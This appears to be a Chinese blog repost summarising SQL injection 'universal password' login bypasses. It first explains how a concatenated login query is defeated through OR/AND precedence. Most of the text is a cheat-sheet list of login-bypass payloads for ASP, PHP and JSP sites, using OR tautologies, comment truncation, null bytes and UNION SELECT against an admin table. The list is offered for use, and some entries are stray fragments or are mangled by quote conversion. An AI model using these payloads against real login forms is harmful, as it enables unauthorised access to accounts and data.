首页 > 数据库 >sql注入之万能密码总结

sql注入之万能密码总结

时间:2023-03-18 21:46:14浏览次数:49  
标签:Username admin 万能 密码 sql -- Password

原验证登陆语句:SELECT * FROM admin WHERE Username= '".$username."' AND Password= '".md5($password)."'
输入 1′ or 1=1 or ‘1’=’1万能密码语句变为:SELECT * FROM admin WHERE Username='1' OR 1=1 OR '1'='1' AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG'

即得到优先级关系:or<and<not,同一优先级默认从左往右计算。
(1.)上面’1’=‘1’ AND Password='EDFKGMZDFSDFDSFRRQWERRFGGG’先计算肯定返回false,因为密码是我们乱输入的。(此处是假)
(2.)Username=‘1’ 返回假,没有用户名是1(此处是假)
(3.)1=1返回真(此处是真)
以上的结果是: 假 or 真 or假 返回真。验证通过。

万能密码

' or 1='1
'or'='or'
admin
admin'--
admin' or 4=4--
admin' or '1'='1'--
admin888
"or "a"="a
admin' or 2=2#
a' having 1=1#
a' having 1=1--
admin' or '2'='2
')or('a'='a
or 4=4--
c
a'or' 4=4--
"or 4=4--
'or'a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 4=4
'OR 4=4%00
"or 4=4%00
'xor
admin' UNION Select 1,1,1 FROM admin Where ''='
1
-1%cf' union select 1,1,1 as password,1,1,1 %23
1
17..admin' or 'a'='a 密码随便
'or'='or'
'or 4=4/*
something
' OR '1'='1
1'or'1'='1
admin' OR 4=4/*
1'or'1'='1

asp aspx万能密码

1:”or “a”=”a
2: ‘)or(‘a’=’a
3:or 1=1–
4:’or 1=1–
5:a’or’ 1=1–
6:”or 1=1–
7:’or’a’=’a
8:”or”=”a’=’a
9:’or”=’
10:’or’=’or’
11: 1 or ‘1’=’1’=1
12: 1 or ‘1’=’1’ or 1=1
13: ‘OR 1=1%00
14: “or 1=1%00
15: ‘xor
16: 用户名 ’ UNION Select 1,1,1 FROM admin Where ”=’ (替换表名admin)
密码 1
17…admin’ or ‘a’=’a 密码随便

PHP万能密码

‘or 1=1/*
User: something
Pass: ’ OR ‘1’=’1

jsp 万能密码

1’or’1’=’1
admin’ OR 1=1/*

标签:Username,admin,万能,密码,sql,--,Password
From: https://www.cnblogs.com/aidy/p/17231878.html

相关文章

  • DVWA-SQL Injection(SQL注入)
      SQLInjection,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的。结构,从而达到执行恶意SQL语句的目的。LOW:代码审计:SQLInjectionSourcevulnerabilities/s......
  • [redis] 设置密码
    安装好redis之后默认没有密码。修改redis.conf配置设置密码参数requirepass配置redis访问密码重启服务生效在登录时输入密码:redis-cli-p6379-apwddocker......
  • MySQL数据库的SQL优化
    分创建时和查询时这两个阶段的优化展开。创建时优化Schema和数据类型优化尽量使用对应的数据类型。比如,不要用字符串类型保存时间,用整型保存IP。选择更小的数据类型。......
  • 力扣262(MySQL)-行程和用户(困难)
    题目:表:Trips 表:Users取消率的计算方式如下:(被司机或乘客取消的非禁止用户生成的订单数量)/(非禁止用户生成的订单总数)。写一段SQL语句查出 "2013-10-01" 至......
  • 用密码控制可查看的内容
    问题:同一工作表中,有三列需要输入密码以后才能查看。条件格式和保护工作表解决。选取待保密的三列,如图为G、H、I三列,依次单击【开始】、【条件格式】、【新建规则】、【设......
  • PentestLab-web安全SQL注入-EXP6
    我们打开靶机,选择“SQL Injections”选择“Example6”观察页面我们使用工具测试参数为-u"http://192.168.29.148/sqli/example6.php?id=2"--dumpall开始测试没有发现我......
  • Oracle SQL 常用的将varchar数据处理成number的正则
    OracleSQL常用的数据处理正则去除所有的空格replace(t.dxmz,chr(32),'')匹配纯数字regexp_like(t.zgbs,'^[[:digit:]]*$')含有字母regexp_like(t.dxmz,'[a-zA-Z]')......
  • sqlalchemy 使用指南
    数据表生成model:1.连接mysqlsqlacodegenmysql+cymysql://user:password@ip/database--tablestablename,tablename>file.py 2.连接oraclesqlacodegenoracle......
  • SQL Server数据库开发的二十一条军规
    如果你正在负责一个基于SQLServer的项目,或者你刚刚接触SQLServer,你都有可能要面临一些数据库性能的问题,这篇文章会为你提供一些有用的指导(其中大多数也可以用于其它的DBM......
  • 52 条 SQL 语句性能优化策略,建议收藏!
    来源:SimpleWuwww.cnblogs.com/SimpleWu/p/9929043.html本文会提到52条SQL语句性能优化策略。1、对查询进行优化,应尽量避免全表扫描,首先应考虑在where及orderby涉及的......